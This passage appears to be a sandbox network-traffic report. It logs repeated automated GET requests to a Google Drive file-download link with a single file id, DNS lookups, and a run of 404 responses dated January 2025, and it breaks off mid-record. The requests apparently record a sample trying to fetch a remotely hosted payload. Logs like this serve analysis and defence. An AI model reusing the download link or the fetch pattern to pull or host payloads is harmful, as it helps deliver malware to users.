Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRItJsbaVhjt_cH3whBghLTj1BzoV4Rbw20kvhP1NRs8uDPh1jZ5BjDnTnr9rVpLZrU2v7uFTgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:08 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-TdPoMTmsTn2hnyQZsCQJ1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ; expires=Sat, 12-Jul-2025 14:45:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ3Ge0rWQ4OIGcTWeR2SNaabGuv1uQ48BAjgRLWePPwmNEnIUSzDJSp6HJQ7MnoVaYHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:10 GMTContent-Security-Policy: script-src 'nonce-AEjyUSC5TCe81czzXPjESQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSmoUgooKuoCmpwHl9xZzJuBp1UwZQddB8FOUyupwXmI-xTGmkCRckAkM3x4_xPzRpkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:13 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-g6wcti4bQ6XoIAO1LKVqlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSXr6AFJfF9KbYr1M_yXQBRhDhIzOuy9qZ4mDToqHipmfIiB2SGTk9lUelM0JBo4xJ18DhLAM0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:15 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Lw2RzfHWkk8OjXESxbIjpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTVnld8NBC9qZ6EF2Wd45AEtYXlyLBGP4Um8doA2PSmJuQytL6gL8ADExV6QuSf1k5QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WsNNETnZk-9HHybQCYMajA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS0NwoZjxbND-O7t_mpQojFmjEEXZ2mrg0nTIqzMXIm7LqdPvHu7xTW3NaS2ygdw5tMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:20 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-rTwP-3V4K3rLALPE6X4RIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQodhPfFNCH_5bvuArjmA8vtwF8vrWPopqbTCkqTHjqYNAtgwfyljbPlqf0B9cN8B8-9SuFq3YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-B6untYPBwt6NZp6jWzROgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC642jpa9hBmOKS_H0J3_XPjAw_Mp8qef-URwNmsl6R46LcFIhZ23m5jxQRk7V1IIT27Em0noYkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-g6RZnaCTBc3IBmTpEtzEPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTItGmw0gSGNK4lisgiCpRtFGYBFvJQnaVo4KjLhZII-vMLJZ8jotq4WSXvzLOkUeGDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:27 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-8UL9d_YX-73sKYdk8eErHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ50_Y7lKi-k4jakiYvyCHZu3qKLi5Ef5IuJ5QO5ayrWWhXh0gZnbv1-i8-Ky1XuJGLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fYQ-fiEFYQzlRjLH-i2GyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ9mAEzAwQ1oEhMRriQ1koDrWl5mDdwmY6wsOGUA0bqMd8x3PH837fs3ECdPZ_ZdDFaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-S3TBv8y5QAt1Nlh1dDUupQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRUfsVt0uDyTzz8SyOB1VDzMxftZFQNa3TQ4fshzVNh8esh3jXI6mabpqxdMikV48ZoUL02VDsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZOGr9pyoPNPWYapgow21rA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, 